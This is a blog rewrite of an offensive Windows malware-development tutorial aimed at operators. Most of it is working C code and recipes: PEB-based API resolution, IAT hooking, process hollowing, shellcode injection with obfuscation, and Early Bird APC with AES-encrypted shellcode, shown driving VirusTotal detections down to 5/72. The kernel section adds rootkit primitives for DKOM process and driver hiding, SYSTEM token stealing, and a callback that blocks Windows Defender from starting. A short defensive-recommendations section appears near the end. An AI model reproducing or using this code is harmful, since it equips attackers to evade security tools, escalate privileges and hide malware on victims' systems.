VirusTotal scan showing 5 out of 72 detections after AES encryption and Early Bird APC injection

Malware Development Essentials for Operators: From PEB Walking to Kernel-Mode DKOM

Original English rewrite with full credit. This article is an independent English-language rewrite of “Malware Development Essentials for Operators”, published on f00crew.org (page /0x33). Author not clearly listed on the source page — site handle 0x00, no byline.

All technical content, code samples, ASCII diagrams, and VirusTotal screenshots are the work of the original author. The prose below is rewritten in our own words and trimmed for blog length; short critical code excerpts are kept verbatim for technical fidelity. For the full code listings and every walkthrough step, read the source.

Source: f00crew.org/0x33

Executive Summary

The original article is a long, code-heavy walkthrough of Windows malware development aimed at offensive operators. It starts at the user-mode foundations — resolving Windows APIs by walking the PEB instead of importing them statically, hooking the IAT to redirect calls inside a process — and then layers up through every classic code-injection technique: process hollowing against a legitimate GoogleUpdate.exe, three flavours of DLL injection (path-based, full-binary/reflective, and syscall-level via ntdll), then Early Bird APC injection with AES-256-encrypted shellcode, which the author shows driving VirusTotal detections from 27/72 down to 5/72.

The second half crosses Ring 0. The author writes a minimal Windows device driver, walks the IRP dispatch model, builds a kernel-mode DLL injector using PsSetLoadImageNotifyRoutine + kernel APCs (mirroring the Sirefef/ZeroAccess rootkit pattern), and then demonstrates four kernel primitives that any post-exploitation rootkit needs: DKOM process hiding by unlinking from EPROCESS.ActiveProcessLinks, driver hiding by unlinking from LDR_DATA_TABLE_ENTRY.InLoadOrderLinks, SYSTEM token stealing from PsInitialSystemProcess, and kernel callbacks via PsSetCreateProcessNotifyRoutineEx to block security tools like MsMpEng.exe from launching. Hardcoded Windows 10 build 19041+ offsets are baked into the kernel snippets.

PEB Structure

Every analyst-friendly binary betrays itself through its IAT: open it in any PE viewer and the imports tell you what it can do. The author’s first move is to delete that signal. On Windows the Process Environment Block (PEB) is reachable from a thread without importing anything — on x86 via fs:[0x30], on x64 via GS:[0x60] — and from the PEB you can walk InMemoryOrderModuleList to enumerate every loaded module and find its base address. Once you have a module base, you parse its PE export table to resolve any function by name. The two helpers from the article:

size_t GetModHandle(wchar_t *libName) {
    PEB32 *pPEB = (PEB32 *)__readfsdword(0x30);
    PLIST_ENTRY header = &(pPEB->Ldr->InMemoryOrderModuleList);

    for (PLIST_ENTRY curr = header->Flink; curr != header; curr = curr->Flink) {
        LDR_DATA_TABLE_ENTRY32 *data = CONTAINING_RECORD(
            curr, LDR_DATA_TABLE_ENTRY32, InMemoryOrderLinks
        );
        printf("current node: %ls\n", data->BaseDllName.Buffer);
        if (_wcsicmp(libName, data->BaseDllName.Buffer) == 0)
            return data->DllBase;
    }
    return 0;
}
size_t GetFuncAddr(size_t moduleBase, char* szFuncName) {
    PIMAGE_DOS_HEADER dosHdr = (PIMAGE_DOS_HEADER)(moduleBase);
    PIMAGE_NT_HEADERS ntHdr = (PIMAGE_NT_HEADERS)(moduleBase + dosHdr->e_lfanew);
    IMAGE_OPTIONAL_HEADER optHdr = ntHdr->OptionalHeader;
    IMAGE_DATA_DIRECTORY dataDir_exportDir = optHdr.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT];

    PIMAGE_EXPORT_DIRECTORY exportTable = (PIMAGE_EXPORT_DIRECTORY)(moduleBase + dataDir_exportDir.VirtualAddress);
    DWORD* arrFuncs = (DWORD *)(moduleBase + exportTable->AddressOfFunctions);
    DWORD* arrNames = (DWORD *)(moduleBase + exportTable->AddressOfNames);
    WORD* arrNameOrds = (WORD *)(moduleBase + exportTable->AddressOfNameOrdinals);

    for (size_t i = 0; i < exportTable->NumberOfNames; i++) {
        char* sz_CurrApiName = (char *)(moduleBase + arrNames[i]);
        WORD num_CurrApiOrdinal = arrNameOrds[i];
        if (!stricmp(sz_CurrApiName, szFuncName)) {
            printf("[+] Found ordinal %.4x - %s\n", num_CurrApiOrdinal, sz_CurrApiName);
            return moduleBase + arrFuncs[ num_CurrApiOrdinal ];
        }
    }
    return 0;
}

Strung together, GetFuncAddr(GetModHandle(L"kernel32.dll"), "WinExec") gets you WinExec("calc") with zero imports visible to static analysis.

Dynamic function loading via IAT hooking

The same PE knowledge used to read exports can be used to rewrite the IAT in your own process — or, with a remote-write primitive, in another. The conceptual diagram from the source:

                    Application                                      mydll
               +-------------------+                           +--------------------+
               |                   |                           |    MessageBoxA     |
               |                   |           +-------------> |--------------------|
               | call MessageBoxA  |      IAT  |               |        ....        |
               |                   |  +-------------------+    |   (user32!MsgBoxA) |
               +-------------------+  |                   |    |        ....        |
                                      |        jmp        +--->+--------------------+
                                      |                   |
                                      +-------------------+

The author’s iatHook walks the import descriptors looking for a target API name and, when it finds the matching IMAGE_THUNK_DATA in FirstThunk, swaps the function pointer for a caller-supplied callback while remembering the original address:

void iatHook(char *module, const char *szHook_ApiName, size_t callback, size_t &apiAddr) {
    auto dir_ImportTable = getNtHdr(module)->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT];
    auto impModuleList = (IMAGE_IMPORT_DESCRIPTOR *)&module[dir_ImportTable.VirtualAddress];
    for (; impModuleList->Name; impModuleList++) {
        auto arr_callVia = (IMAGE_THUNK_DATA *)&module[impModuleList->FirstThunk];
        auto arr_apiNames = (IMAGE_THUNK_DATA *)&module[impModuleList->OriginalFirstThunk];
        for (int i = 0; arr_apiNames[i].u1.Function; i++) {
            auto curr_impApi = (PIMAGE_IMPORT_BY_NAME)&module[arr_apiNames[i].u1.Function];
            if (!strcmp(szHook_ApiName, (char *)curr_impApi->Name)) {
                apiAddr = arr_callVia[i].u1.Function;
                arr_callVia[i].u1.Function = callback;
                break;
            }
        }
    }
}

Process hollowing

Hollowing replaces the legitimate image inside a suspended process with your own PE without changing the process name or its parent relationships. The original walkthrough targets GoogleUpdate.exe for plausible cover. The recipe: CreateProcessA with CREATE_SUSPENDED, allocate RWX in the child, copy the PE sections in (preserving VirtualAddressPointerToRawData), update the child’s thread context so RCX (x64) or EAX (x86) holds your entry point and the PEB’s ImageBaseAddress field (at Rdx+0x10 on x64, Ebx+8 on x86) points at your new base, then SetThreadContext and ResumeThread. The core copy and context-update is:

WriteProcessMemory(PI.hProcess, pImageBase, Image, NtHeader->OptionalHeader.SizeOfHeaders, NULL);
for (int i = 0; i < NtHeader->FileHeader.NumberOfSections; i++)
    WriteProcessMemory(
        PI.hProcess, 
        LPVOID((size_t)pImageBase + SectionHeader[i].VirtualAddress),
        LPVOID((size_t)Image + SectionHeader[i].PointerToRawData), 
        SectionHeader[i].SizeOfRawData, 
        0
    );

WriteProcessMemory(PI.hProcess, LPVOID(CTX->Rdx + 0x10), LPVOID(&pImageBase), sizeof(PVOID), 0);
CTX->Rcx = (SIZE_T)pImageBase + NtHeader->OptionalHeader.AddressOfEntryPoint;
SetThreadContext(PI.hThread, LPCONTEXT(CTX)); 
ResumeThread(PI.hThread);

DLL injection techniques

The article works through the canonical CreateRemoteThread(LoadLibraryA) dance and its alternatives. The skeleton: OpenProcess with PROCESS_CREATE_THREAD | PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_WRITE | PROCESS_VM_READ, then either (a) write a DLL path into the remote process and have LoadLibraryA load it from disk, or (b) write the entire DLL image and call a reflective loader inside it that maps and relocates itself without ever touching disk. Because kernel32.dll is at the same base in every process on a given boot (ASLR randomises per-boot, not per-process), GetProcAddress(GetModuleHandle("kernel32"), "LoadLibraryA") in the injector also gives you the address in the target.

For execution, CreateRemoteThread is the loud option. The quieter alternative is the undocumented NtCreateThreadEx in ntdll, which the article wraps in a helper, and which sidesteps several EDR hooks aimed specifically at CreateRemoteThread. The author also references the ired.team walkthrough on DLL injection for additional context.

Shellcode execution & obfuscation chain

The article’s shellcode chapter is structured as a detection-reduction experiment. A raw MSFVenom x64/exec payload that spawns notepad.exe, copied into an OpenProcessVirtualAllocExWriteProcessMemoryCreateRemoteThread loader, lands at:

VirusTotal scan showing 27 out of 72 detections for a raw MSFVenom shellcode loader
VirusTotal — 27/72 detections on the raw MSFVenom loader. Source: original article.

Step one is moving off the CreateRemoteThread rail and calling the syscall-tier functions directly: NtAllocateVirtualMemory, NtWriteVirtualMemory, NtCreateThreadEx, with the necessary struct definitions (_UNICODE_STRING, _OBJECT_ATTRIBUTES, _PS_ATTRIBUTE, _PS_ATTRIBUTE_LIST) lifted from undocumented.ntinternals.net. Step two is to stop putting plaintext API names and ntdll strings in the binary. A trivial XOR helper does the job:

unsigned char * rox(unsigned char * data, int dataLen, int xor_key) {
    unsigned char * output = (unsigned char *)malloc(sizeof(unsigned char) * dataLen + 1);

    for (int i = 0; i < dataLen; i++)
        output[i] = data[i] ^ xor_key;

    return output;
}

With strings XOR’d and the syscall path replacing the user-mode wrappers, detections drop sharply:

VirusTotal scan showing 9 out of 72 detections after XOR string obfuscation
VirusTotal — 9/72 detections after XOR string obfuscation + syscall-tier loader. Source: original article.

Step three is the big move: Early Bird APC injection. The author launches a legitimate-looking host (svchost.exe) with CREATE_SUSPENDED, decrypts the AES-256-encrypted shellcode into VirtualAllocEx’d memory inside that process, queues it as a user-mode APC via QueueUserAPC, and resumes the thread. Because the APC fires before ntdll!LdrInitializeThunk finishes wiring up the process, most user-mode security hooks have not been installed yet. The CryptoAPI wrapper used for decryption goes through CryptAcquireContextW(PROV_RSA_AES)CryptCreateHash(CALG_SHA_256)CryptHashDataCryptDeriveKey(CALG_AES_256)CryptDecrypt. The detection floor reaches:

VirusTotal scan showing 5 out of 72 detections after AES encryption and Early Bird APC injection
VirusTotal — 5/72 detections after AES-256 + Early Bird APC injection. Source: original article.

The author credits the Early Bird technique to the publicly documented APT33 (Elfin/Refined Kitten) tradecraft.

Writing a simple kernel-mode rootkit

Minimal driver and IRP dispatch

A Windows kernel driver has the same skeleton as a console app, except it exports DriverEntry instead of main and talks to user mode through I/O Request Packets (IRPs). The article’s minimal example is two functions and a dispatch-table fill-in:

NTSTATUS DriverEntry(IN PDRIVER_OBJECT DriverObject, IN PUNICODE_STRING RegistryPath) {
    DbgPrint("Hello World!");
    return STATUS_SUCCESS;
}

NTSTATUS OnStubDispatch(IN PDEVICE_OBJECT DeviceObject, IN PIRP Irp) {
    Irp->IoStatus.Status = STATUS_SUCCESS;
    IoCompleteRequest(Irp, IO_NO_INCREMENT);
    return STATUS_SUCCESS;
}

The driver registers IRP_MJ_CREATE, IRP_MJ_CLOSE, IRP_MJ_DEVICE_CONTROL, IRP_MJ_READ, and IRP_MJ_WRITE to OnStubDispatch (or specialised handlers), creates a device object with IoCreateDevice under \Device\MyDevice, and exposes it to user mode via IoCreateSymbolicLink at \DosDevices\MyDevice. User-mode clients then talk to it through CreateFile(L"\\\\.\\MyDevice", ...) and DeviceIoControl. Loading the compiled driver requires either an EV-signed binary (Secure Boot path) or test-signing mode plus an sc create / sc start on a registry-defined service under HKLM\SYSTEM\CurrentControlSet\Services. The author points at memn0ps’ rootkit notes and the “Windows APT Warfare” book for deeper kernel reading.

Kernel-mode DLL injection (Sirefef-style)

Kernel-mode injection beats user-mode injection because it runs above every user-mode hook and can inject before the target process is fully initialised. The recipe in the article mirrors the Sirefef/ZeroAccess pattern: register a callback with PsSetLoadImageNotifyRoutine, wait for the target process to load KERNEL32.DLL (matched via FsRtlIsNameInExpression(L"*\\KERNEL32.DLL", ...)), resolve LoadLibraryExA in the target’s context, allocate non-paged-pool memory for a KAPC, initialise it with KeInitializeApc, and queue it with KeInsertQueueApc — the target thread executes the APC on its way back to user mode and loads your DLL before its own startup completes.

The injection helper switches into the target’s address space with KeStackAttachProcess, uses ZwAllocateVirtualMemory + RtlCopyMemory (or strcpy) to drop the DLL path, then KeUnstackDetachProcess back to the caller before queueing the APC. Synchronisation between the LoadImageNotifyRoutine callback (called at high IRQL) and the actual injection work is done by deferring to a worker thread on DelayedWorkQueue with ExQueueWorkItem and a NotificationEvent.

Hide process (DKOM)

The most enduring rootkit trick on Windows is also the simplest: the kernel keeps the master list of processes as a doubly-linked list embedded in each EPROCESS at ActiveProcessLinks. Unlink your process node from that list and you vanish from NtQuerySystemInformation, Task Manager, tasklist, and anything else that enumerates the list. The process keeps running because the scheduler indexes threads, not the process list.

LIST_ENTRY doubly-linked list diagram showing how a process is unlinked from ActiveProcessLinks
Unlinking process B from the ActiveProcessLinks doubly-linked list. Source: original article.

The catch is the offsets: EPROCESS is opaque and version-dependent. The article hardcodes Windows 10 build 19041+ x64 layout:

NTSTATUS HideProcess(ULONG pid) {
    PEPROCESS currentEProcess = PsGetCurrentProcess();
    LIST_ENTRY* currentList = &currentEProcess->ActiveProcessLinks;

    ULONG uniqueProcessIdOffset = 0x2F0;
    ULONG activeProcessLinksOffset = 0x400;

    ULONG currentPid;
    do {
        RtlCopyMemory(&currentPid, (PUCHAR)currentEProcess + uniqueProcessIdOffset, sizeof(currentPid));
        if (currentPid == pid) {
            LIST_ENTRY* blink = currentList->Blink;
            LIST_ENTRY* flink = currentList->Flink;
            blink->Flink = flink;
            flink->Blink = blink;
            return STATUS_SUCCESS;
        }

        currentList = currentList->Flink;
        currentEProcess = CONTAINING_RECORD(currentList, EPROCESS, ActiveProcessLinks);
    } while (currentList != &currentEProcess->ActiveProcessLinks);

    return STATUS_NOT_FOUND;
}

Caveats acknowledged in the source: not thread-safe as written, and any direct kernel structure mutation risks PatchGuard tripping a bugcheck. A subtler but harder-to-detect alternative is hooking NtQuerySystemInformation to filter responses.

Hiding a driver

The driver-module equivalent: the loaded-driver list is reachable from DRIVER_OBJECT.DriverSection (an undocumented PLDR_DATA_TABLE_ENTRY), and unlinking via InLoadOrderLinks makes the driver invisible to lm in WinDbg, systeminfo, and Process Explorer. The author raises IRQL to DISPATCH_LEVEL for the pointer surgery to keep it atomic:

NTSTATUS HideDriver(PDRIVER_OBJECT driverObject) {
    KIRQL irql;
    irql = KeRaiseIrqlToDpcLevel();

    PLDR_DATA_TABLE_ENTRY moduleEntry = (PLDR_DATA_TABLE_ENTRY)driverObject->DriverSection;

    moduleEntry->InLoadOrderLinks.Blink->Flink = moduleEntry->InLoadOrderLinks.Flink;
    moduleEntry->InLoadOrderLinks.Flink->Blink = moduleEntry->InLoadOrderLinks.Blink;

    KeLowerIrql(irql);
    return STATUS_SUCCESS;
}

Token stealing for privilege escalation

Once you have arbitrary kernel writes, the cheapest way from a non-admin process to NT AUTHORITY\SYSTEM is to copy the SYSTEM process token into your own EPROCESS.Token slot. The SYSTEM process is reachable from any kernel driver as the global PsInitialSystemProcess. Walk the ActiveProcessLinks list from there, find the target PID, and replace its token pointer:

NTSTATUS ElevateProcess(ULONG targetPid) {
    ULONG tokenOffset = 0x4B8;
    ULONG uniqueProcessIdOffset = 0x2F0;
    ULONG activeProcessLinksOffset = 0x400;

    PEPROCESS systemProcess = PsInitialSystemProcess;
    PACCESS_TOKEN systemToken = *(PACCESS_TOKEN*)((PUCHAR)systemProcess + tokenOffset);

    PLIST_ENTRY head = (PLIST_ENTRY)((PUCHAR)systemProcess + activeProcessLinksOffset);
    PLIST_ENTRY current = head->Flink;

    while (current != head) {
        PEPROCESS proc = (PEPROCESS)((PUCHAR)current - activeProcessLinksOffset);
        ULONG pid = 0;
        RtlCopyMemory(&pid, (PUCHAR)proc + uniqueProcessIdOffset, sizeof(pid));

        if (pid == targetPid) {
            *(PACCESS_TOKEN*)((PUCHAR)proc + tokenOffset) = systemToken;
            return STATUS_SUCCESS;
        }
        current = current->Flink;
    }
    return STATUS_NOT_FOUND;
}

Production-quality rootkits also have to deal with EX_FAST_REF — the lowest four bits of the token pointer encode a reference count. The article notes the gap and recommends masking before copy; the snippet above is the minimum to make the trick work.

Kernel callbacks

The same callback APIs that legitimate EDR products use can be used against them. PsSetCreateProcessNotifyRoutineEx lets a driver inspect each new process before it starts and reject the creation by returning STATUS_ACCESS_DENIED in CreateInfo->CreationStatus. A textbook block on Windows Defender’s MsMpEng.exe:

VOID ProcessNotifyCallback(PEPROCESS Process, HANDLE ProcessId, PPS_CREATE_NOTIFY_INFO CreateInfo) {
    if (CreateInfo != NULL) {
        if (CreateInfo->ImageFileName != NULL) {
            if (wcsstr(CreateInfo->ImageFileName->Buffer, L"MsMpEng.exe")) {
                CreateInfo->CreationStatus = STATUS_ACCESS_DENIED;
            }
        }
    }
}

Companion APIs cover the same surface in other directions: PsSetCreateThreadNotifyRoutine for threads, PsSetLoadImageNotifyRoutine for DLLs/drivers being mapped, ObRegisterCallbacks for handle creation (used by EDRs to gate PROCESS_VM_WRITE), and CmRegisterCallbackEx for registry operations. A rootkit that owns these callbacks owns the host’s observability surface.

Key Takeaways

  • PEB walking + export-table parsing deletes the IAT signal that static analysis depends on. Any binary that needs to be quiet should resolve APIs dynamically.
  • Process hollowing into legitimate hosts (GoogleUpdate.exe, svchost.exe) keeps the process name above suspicion. Update RCX/EAX for entry and the PEB’s ImageBaseAddress field for completeness.
  • Syscall-tier injection via NtAllocateVirtualMemory / NtWriteVirtualMemory / NtCreateThreadEx sidesteps the user-mode hooks aimed at CreateRemoteThread.
  • Early Bird APC + AES-256 shellcode drives the article’s VirusTotal detections from 27/72 to 5/72. The timing matters as much as the crypto — APCs that fire before LdrInitializeThunk run before most user-mode telemetry exists.
  • Kernel-mode DLL injection via PsSetLoadImageNotifyRoutine + APC matches the Sirefef/ZeroAccess pattern and runs above every user-mode hook.
  • DKOM (unlinking from ActiveProcessLinks / InLoadOrderLinks) is cheap, durable, and still effective against tools that enumerate kernel lists — at the cost of fragility against PatchGuard and version-specific offsets.
  • Token stealing from PsInitialSystemProcess is the canonical kernel-exploit payload, but production code must respect the EX_FAST_REF reference-count bits.
  • Kernel callbacks weaponise EDR’s own primitives: a rootkit holding PsSetCreateProcessNotifyRoutineEx can prevent MsMpEng.exe from launching at all.

Defensive Recommendations

  • Don’t rely on static IAT analysis as a signal. Detect dynamic resolution behaviour: API hashing, walks of InMemoryOrderModuleList, manual PE export-table parsing in suspicious processes.
  • Monitor parent/child anomalies on classic hollowing targets: GoogleUpdate.exe, svchost.exe, and any process whose entry-point register is overwritten by SetThreadContext immediately after CREATE_SUSPENDED.
  • Treat syscall-tier ntdll use as a high-signal anomaly. Direct calls to NtAllocateVirtualMemory/NtWriteVirtualMemory/NtCreateThreadEx from non-system processes — especially in cross-process patterns — should alert.
  • Detect Early Bird APCs by watching for QueueUserAPC against a thread in a CREATE_SUSPENDED process before ResumeThread. The pattern is rare in legitimate software.
  • Enforce Driver Signature Enforcement and Hypervisor-protected Code Integrity (HVCI). Most of the kernel half of this article fails to load without test-signing or an EV-signed driver.
  • Periodically reconcile process and module lists. Compare NtQuerySystemInformation results against scheduler-side or memory-scan-based enumerations to catch DKOM’d processes/drivers.
  • Detect token-pointer inconsistencies. A non-SYSTEM process holding the SYSTEM token pointer is a kernel-exploit fingerprint; EDR vendors increasingly check for this directly.
  • Protect the security-tool process tree. Watch for kernel callbacks that fail MsMpEng.exe / EDR sensor startup — the silent-block pattern is itself the signal.

Conclusion

What makes the f00crew piece useful is not any one trick — every individual technique here has its own writeup — but the way they are stacked into a coherent operator pipeline: dynamic API resolution feeds quiet shellcode loading, syscall-tier injection feeds Early Bird APC, the kernel driver feeds DKOM and token stealing, and kernel callbacks finally turn the security stack’s own machinery against it. The detection drops along the way (27/72 → 9/72 → 5/72) are a concrete reminder that on Windows, defence-in-depth has to be behavioural, not signature-based: any single layer can be deleted by a competent loader. Reading the original is well worth your time if you defend Windows estates or build the tools that watch them.

This article is an independent English-language rewrite of «Malware Development Essentials for Operators», originally published on f00crew.org (page /0x33). All code samples, ASCII diagrams, and VirusTotal screenshots are the work of the original author. Please cite f00crew when referencing this material.

Comments are closed.